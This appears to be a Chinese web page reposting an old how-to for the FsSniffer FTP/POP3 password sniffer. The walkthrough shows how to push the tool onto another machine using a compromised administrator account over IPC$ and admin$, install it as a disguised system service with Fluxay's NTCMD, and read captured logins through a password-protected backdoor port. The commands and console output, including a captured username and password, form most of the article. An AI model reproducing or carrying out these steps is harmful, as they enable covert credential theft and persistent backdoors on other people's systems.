游乐游手机版
首页/网络安全/文章详情

流影 POP3/FTP Sniffer 说明

时间:2026-04-19 11:35
本地使用指南 启动FsSniffer工具的标准命令格式为:FSSNIFFER -S 。下面详细解析每个参数的具体含义: Bind IP:指需要绑定的IP地址,通常设置为本地主机的IP地址,用于监听网络数据。 Port:此参数用于指定控制端口,后续需要通过此端口登录管理界面,查看捕获到的网络数据包结果

本地使用指南

启动FsSniffer工具的标准命令格式为:FSSNIFFER -S 。下面详细解析每个参数的具体含义:

Bind IP:指需要绑定的IP地址,通常设置为本地主机的IP地址,用于监听网络数据。

Port:此参数用于指定控制端口,后续需要通过此端口登录管理界面,查看捕获到的网络数据包结果。

Control Password:登录控制台时所需的身份验证密码,用于保障管理安全。

成功登录FsSniffer管理控制台后,需要掌握几个核心操作命令:使用Show Result命令可以查看所有捕获到的网络记录;输入Quit命令可直接退出当前控制台会话;而执行ShutDown命令则会彻底终止FsSniffer的监控进程。

远程部署与应用

远程部署FsSniffer的步骤相对复杂,但逻辑清晰。我们通过一个典型实例进行说明:假设已获取目标主机211.152.188.1的一个管理员组账号test,密码为test。

第一步,建立远程连接。 使用Windows系统自带的net use命令建立IPC$连接:

D:\>net use \\211.152.188.1\ipc$ test /user:test
The command completed successfully.

连接建立成功后,第二步是上传FsSniffer工具。 将本地的FsSniffer.exe文件直接复制到远程主机的系统目录(也可借助流光IV等安全工具中的“种植者”功能完成上传):

D:\>copy “d:\My Documents\ShadowSniffer\Release\FsSniffer.exe” \\211.152.188.1\admin$
1 file(s) copied.

第三步,安装并启动服务。 利用流光IV内置的NTCMD工具远程执行FsSniffer.exe,将其安装为系统服务。具体操作与系统回显如下:

=============Windows NT/2000 NTCmd Ver 0.1 for Fluxay IV============
Written by Assassin, https://www.netXeyes.com https://www.netXeyes.org
NTCMD>ver
Microsoft Windows 2000 [Version 5.00.2195]
NTCMD>fssniffer.exe -I test test ShadowSniffer 211.152.188.1 7 123456
 Flux Shadow Sniffer(FTP/POP3) Edition, Written by Assassin 2001
TestSniffer1 installed.
NTCMD>

至此,远程主机上已成功安装了一个名为“ShadowSniffer”的系统服务。接下来,使用net命令启动该服务:

NTCMD>net start shadowsniffer
The ShadowSniffer service is starting..
The ShadowSniffer service was started successfully.

这里需要详细说明安装服务时的命令格式:FsSniffer -I 。 各参数定义如下:UserNamePassword指远程主机上具备管理员权限的账号和密码;Service Name是用户自定义的服务名称,若安装失败,可尝试将FsSniffer.exe文件改名后重新执行;Bind Local IP是远程主机的监听IP地址,对于多网卡主机,需根据监听目标(如内网或外网流量)选择正确的地址;Port是后门控制端口号;Control Password则是远程连接时使用的控制密码。

服务启动并运行一段时间后,即可通过Telnet连接查看捕获结果。连接远程主机的指定端口(本例为端口7),并输入控制密码:

D:>telnet 211.152.188.1 7
Control Password: **************
===============Banyet Soft Labs. 1995-2001 All Rights Reserved.========================
Written by Assassin, Server Edition FluxShadow@21cn.com==================
FluxShadow Remote FTP/POP3 Sniffer Beta 1, Pleased to See You Again!======
Flux Shadow Sniffer>show result
===========Flux Shadow Sniffer Edition Results===========
211.152.188.112(1106)->211.152.188.1(8213) USER zjf
211.152.188.112(1106)->211.152.188.1(8213) PASS 1qaz4rfv
211.152.188.1(8213)->211.152.188.112(1106) User zjf logged in.
211.152.188.1(8199)->211.152.188.112(1107) USER zjf
211.152.188.1(8199)->211.152.188.112(1107) PASS 1qaz4rfv
Total 10 Sniffered
======================================================
小榕软件实验室™ 1995-2001版权所有
www.netXeyes.com www.netXeyes.org
dansnow@21cn.com
来源:https://www.jb51.net/hack/5925.html
上一篇Ubuntu系统Exploit漏洞如何处理 下一篇中国移动WFIF疑遭破解 蹭WIFI网凸显管控难题
本站内容用于信息整理与展示,如有侵权或内容问题请及时联系处理。

相关推荐

补充同频道和同主题内容,方便继续浏览更多相关内容。

同类最新

继续查看同栏目最近更新的文章。

更多
Debian环境下Docker安全漏洞防范方法指南
网络安全 · 2026-07-02

Debian环境下Docker安全漏洞防范方法指南

在Debian系统下,Docker的安全防护虽然是个老话题,却始终需要高度警惕。先说几个核心判断:如果你的Docker容器使用root权限运行、镜像来源不明、系统一年不更新,那几乎等同于“裸奔”。下面这套方案虽然不是万能的,但足以抵挡绝大多数已知攻击路径。 1 定期更新系统和软件 保持系统与镜像始

深入解析Linux系统readdir安全漏洞的防范措施与技巧
网络安全 · 2026-07-02

深入解析Linux系统readdir安全漏洞的防范措施与技巧

Linuxreaddir函数存在路径遍历、信息泄露、竞争条件、缓冲区溢出、LD_PRELOAD劫持及权限问题等安全漏洞。防范需实施路径验证、最小权限原则、线程安全保护、缓冲区安全处理、日志审计、输入过滤、权限检查、限制目录深度及使用安全API等综合措施。

Linux syslog日志加密实现方法详解
网络安全 · 2026-07-02

Linux syslog日志加密实现方法详解

Linux系统可利用Syslog-ng、rsyslog或Logrotate结合GnuPG对syslog日志进行AES256加密,需特别注意密钥安全管理、性能影响及加密日志的备份,从而有效防止敏感信息泄露。

Debian系统漏洞修复难点的深度解析与应对策略
网络安全 · 2026-07-02

Debian系统漏洞修复难点的深度解析与应对策略

Debian系统的漏洞修复看似简单,实际操作却充满挑战。核心难点主要集中在系统架构的复杂性、安全更新机制的独特性、用户的使用习惯,以及社区资源的局限性。即便是资深管理员,也常常在以上环节遇到棘手问题。 系统复杂性导致的修复难题 组件数量庞大: Debian系统包含成千上万个软件包,它们之间的依赖关系

Debian系统漏洞修复技巧从入门到精通实战指南
网络安全 · 2026-07-02

Debian系统漏洞修复技巧从入门到精通实战指南

Debian系统漏洞修复需先更新系统并配置安全补丁仓库,可开启自动更新。针对特定漏洞单独修复,结合最小权限、强密码、防火墙与入侵检测,并定期备份数据。关注官方公告及使用扫描工具,对自定义应用进行代码审计。